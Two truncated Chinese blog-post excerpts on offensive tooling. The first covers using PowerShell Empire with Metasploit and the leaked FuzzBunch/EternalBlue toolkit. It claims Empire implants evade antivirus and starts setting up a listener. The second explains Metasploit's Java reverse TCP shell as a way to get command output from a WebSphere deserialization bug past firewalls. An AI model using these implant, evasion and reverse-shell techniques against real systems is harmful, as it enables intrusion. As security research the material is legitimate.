利用Empire桥接Metasploit和ShadowBroker发布的FuzzBunch

ShadowBroker发布的FuzzBunch一石激起千层浪。Windows从XP到8无一幸免,真可谓腥风血雨。我自然也免不了要尝鲜,确实味道不错。但是在使用工具时有个问题,msfvenom直接生成的dll小马儿植入Windows 7后,会导致Windows重启,这对于我这个Metasploit粉来说,不可接受,但也无奈。 后来各种利用手段层出不穷,让我认识到,除了使用DanderSpritz外,Empire也可以生成马儿。 Empire,https://www.powershellempire.com/,一个PowerShell的马儿控制器。因为是PowerShell,所以基本免杀。 Empire的安装,基本上就是clone下来,然后运行 sudo ./setup/install.sh sudo ./empire 1.Empire生成马儿 首先建立Listenr listeners set Name Eternalblue set Host http://10.11.1.16 set Port 5555…

metasploit中的JAVA反向TCP做法的研究

在研究CVE-2015-7450这个JAVA反序列化漏洞时,面临着一个问题:在WebSphere中,该漏洞仅可以执行命令,但是不能回显执行结果。遇到这种漏洞,通常的做法都是利用wget或者curl这样的命令来执行一个http请求,将需要的信息送出。但是在我司,这些命令都没法用。原因是我司大量使用的是AIX操作系统,且是不含有任何功能增强的“裸版”。如何在这种环境下回显执行结果,就变得非常重要。 在Google搜索的过程中,发现了一个漏洞利用工程。在该工程的详细介绍中,提到了一种使用metasploit进行shell反弹的做法。研究了该做法后,对于其设计的巧妙深感佩服,遂介绍一下给大家。 1.什么是metasploit metasploit是一套开源的漏洞利用工具集合和框架。正因为是一个框架,每个人都可以提交利用该框架写的漏洞利用模块。久而久之,该模块库就越来越大,最终形成了一套工具库。关于metasploit在各个系统的安装,这里不再赘述。 2.metasploit中的JAVA反向TCP有什么用 通常,一个漏洞利用,可能会遇到两个讨厌的问题: 如前言中所述,我们可以执行某个命令,但是没办法感知命令执行的结果,于是就变成一个只能搞“破坏”,但是无法被利用起来的漏洞 或者,我们通过漏洞可以植入木马,但是因为有防火墙,我们没办法主动和木马联络,因为一般防火墙的规则都是禁止入站,但是不防止出站。 遇到上述情况,…